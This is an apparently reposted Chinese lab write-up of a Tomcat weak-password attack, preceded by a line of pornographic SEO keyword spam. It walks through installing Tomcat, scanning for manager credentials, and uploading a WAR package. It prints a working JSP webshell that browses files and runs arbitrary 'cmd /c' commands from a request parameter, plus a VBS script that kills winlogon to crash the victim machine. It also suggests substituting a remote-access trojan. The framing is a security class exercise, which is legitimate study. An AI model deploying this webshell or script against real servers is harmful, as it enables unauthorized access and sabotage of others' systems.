日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验

發布時間:2025/3/20 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1、在XP系統上搭建Tomcat服務器平臺;

2、在另一臺虛擬機上利用弱口令漏洞上傳木馬程序,使得XP系統中木馬。

實驗步驟

一、搭建Tomcat服務器平臺

1.安裝JAVAJDK

環境變量的配置:(這里我的JAVA是按照默認安裝地址安裝的)

JAVA_HOME:C:\Program Files\Java\jdk1.7.0_79

Path:%JAVA_HOME%\bin

CLASSPATH:.%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tool.jar

Cmd輸入命令查看

輸入:java –version,檢查是否安裝成功。

1.png (43.07 KB, 下載次數: 0)

2021-4-28 21:07 上傳

輸入:javac,檢查環境變量配置是否成功。

2.png (52.02 KB, 下載次數: 0)

2021-4-28 21:08 上傳

2.安裝Apache-Tomcat服務器

將壓縮包解壓,把整個文件夾拷貝至C盤。(免安裝)

添加環境變量:

TOMCAT_HOME:C:\apache-tomcat-6.0.37

進入bin目錄,點擊startup.bat或者shutdown.bat可以啟動或關閉服務器。

若測試不成功,則需添加完整的環境變量。(可選不是必選)

3.png (95.72 KB, 下載次數: 0)

2021-4-28 21:08 上傳

點擊startup.exe,啟動服務器,在瀏覽器中輸入:http://127.0.0.1:8080/,若顯示如下界面,則服務器啟動成功。

4.png (186.54 KB, 下載次數: 0)

2021-4-28 21:08 上傳

二、登錄管理員后臺

登錄管理員后臺需要用戶名密碼,剛開始未設置,我們要自行設置。

5.png (112.93 KB, 下載次數: 1)

2021-4-28 21:08 上傳

首先查看存放用戶名密碼的文件:在conf文件夾下的tomcat-users.xml,用記事本打開。將管理員賬號添加進去:

其中各個rolename的含義:

6.png (25.94 KB, 下載次數: 1)

2021-4-28 21:08 上傳

點擊保存后重啟服務器,回到登錄界面,輸入用戶名密碼,即可進入管理員界面:

7.png (76.33 KB, 下載次數: 1)

2021-4-28 21:08 上傳

三、木馬制作

Tomcat只支持war的后綴文件包的上傳,因此,必須將jsp木馬程序與其他木馬一起打包成war包才能上傳。

在安裝有JDK的操作系統上,將所需要上傳的木馬放在同一個文件夾中,存放到C盤。

這里用到一個s.jsp的木馬程序以及V.vbs病毒程序。

這里s.jsp的代碼:

[AppleScript] 純文本查看 復制代碼

td,select,input,body

{

font-size:9pt;

}

A { TEXT-DECORATION: none }

Jsp File Manger Version0.5 --bY 慈勤強 [email]cqq1978@Gmail.com[/email]

String getDrivers()

/**

Windows系統上取得可用的所有邏輯盤

**/

{

StringBuffer sb=new StringBuffer("驅動器 : ");

File roots[]=File.listRoots();

for(int i=0;i

{

sb.append("");

sb.append(roots[i]+" ");

}

return sb.toString();

}

%>

String strThisFile="folder.jsp";

request.setCharacterEncoding("gb2312");

String strDir = request.getParameter("path");

if(strDir==null||strDir.length()<1)

{

strDir = "c:\\";

}

StringBuffer sb=new StringBuffer("");

StringBuffer sbFile=new StringBuffer("");

try

{

out.println("

當前目錄: "+strDir+"" + getDrivers() + "

\r\n");

File objFile = new File(strDir);

File list[] = objFile.listFiles();

if(objFile.getAbsolutePath().length()>3)

{

sb.append("

");

sb.append("上級目錄


- - - - - - - - - - - \r\n");

}

for(int i=0;i

{

if(list[i].isDirectory())

{

sb.append("

");

sb.append(""+list[i].getName()+"");

sb.append("

");

//sb.append("\r\n");

}

else

{

String strLen="";

String strDT="";

long lFile=0;

lFile=list[i].length();

if(lFile>1000000)

{

lFile=lFile/1000000;

strLen="" + lFile + " M";

}

else if(lFile>1000)

{

lFile=lFile/1000;

strLen="" + lFile + " K";

}

else

{

strLen="" + lFile + " Byte";

}

Date dt=new Date(list[i].lastModified());

strDT=dt.toLocaleString();

sbFile.append("

");

sbFile.append(""+list[i].getName());

sbFile.append("

");

sbFile.append(""+strLen);

sbFile.append("

");

sbFile.append(""+strDT);

sbFile.append("

");

sbFile.append(" ");

sbFile.append("

\r\n");

//sbFile.append("");

}

}

//out.println(sb.toString()+sbFile.toString());

}

catch(Exception e)

{

out.println("操作失敗: "+e.toString()+"");

}

%>

文件名稱文件大小修改時間文件操作

String strCmd="";

String line="";

StringBuffer sbCmd=new StringBuffer("");

strCmd = request.getParameter("cmd");

if(strCmd!=null)

{

try

{

//out.println(strCmd);

Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);

BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

while((line=br.readLine())!=null)

{

sbCmd.append(line+"\r\n");

}

}

catch(Exception e)

{

System.out.println(e.toString());

}

}

%>

if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)

{

%>

}

%>

這里V.vbs的代碼:

[AppleScript] 純文本查看 復制代碼if MsgBox("你是在上網絡信息安全的課嗎?",vbYesNo,"提示")=vbyes then

msgbox "你真是在上網絡安全課啊,這么好丫!"

else

msgbox "還不承認? 作為懲罰,折騰你一下",64,"嚴重警告!!!!!!"

Set ws = CreateObject("Wscript.Shell")

wscript.sleep 1200

ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide

end if

運行cmd,使用cd命令將目錄切換到剛剛存放的c文件夾下:

8.png (38.04 KB, 下載次數: 1)

2021-4-28 21:08 上傳

使用命令將木馬程序打包:

jar cvf shell.war *

若提示jar不是內部命令,請回到JDK安裝步驟查看環境變量是否配置正確。

成功時的命令提示如下:

9.png (66.95 KB, 下載次數: 1)

2021-4-28 21:08 上傳

四、漏洞入侵

訪問目標網站

使用另一臺電腦輸入以下網址:

http://192.168.41.131:8080/(對應IP地址要改)

訪問成功將出現以下界面:

10.png (117.38 KB, 下載次數: 0)

2021-4-28 21:08 上傳

弱口令掃描

打開Apache Tomcat crack軟件,界面如下:

11.png (51.57 KB, 下載次數: 0)

2021-4-28 21:08 上傳

設置掃描網段,點擊add按鈕添加;點擊start按鈕開始掃描。掃描成功將獲得口令和密碼。

12.png (86.02 KB, 下載次數: 1)

2021-4-28 21:08 上傳

上傳木馬

利用前面掃描到的口令密碼登錄管理員網頁,將之前做好的war包上傳至服務器:

13.png (33.68 KB, 下載次數: 0)

2021-4-28 21:08 上傳

14.png (13.95 KB, 下載次數: 0)

2021-4-28 21:08 上傳

查看木馬

在地址欄中輸入網址:

http://192.168.41.131:8080/shell/s.jsp

即可看到對方電腦中所有的文件目錄:

15.png (68.21 KB, 下載次數: 0)

2021-4-28 21:08 上傳

運行木馬

找出之前一并上傳的木馬文件V.vbs,利用下面的執行功能讓其在被害者電腦上運行:

c:\apache-tomcat-6.0.37\webapps\shell\V.vbs -install

16.png (69.22 KB, 下載次數: 0)

2021-4-28 21:08 上傳

此時在被攻擊者電腦上會自運行病毒程序,即中病毒了。也可將病毒用灰鴿子木馬替換實現遠程控制。

17.png (34.82 KB, 下載次數: 0)

2021-4-28 21:08 上傳

18.png (35.01 KB, 下載次數: 0)

2021-4-28 21:08 上傳

點擊“否”的話要小心哦,因為電腦會變成“藍屏”,不過不用怕,其實就藍屏一會兒就幫你重啟啦~不相信可以返回去看V.vbs的代碼哦~

總結

以上是生活随笔為你收集整理的服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。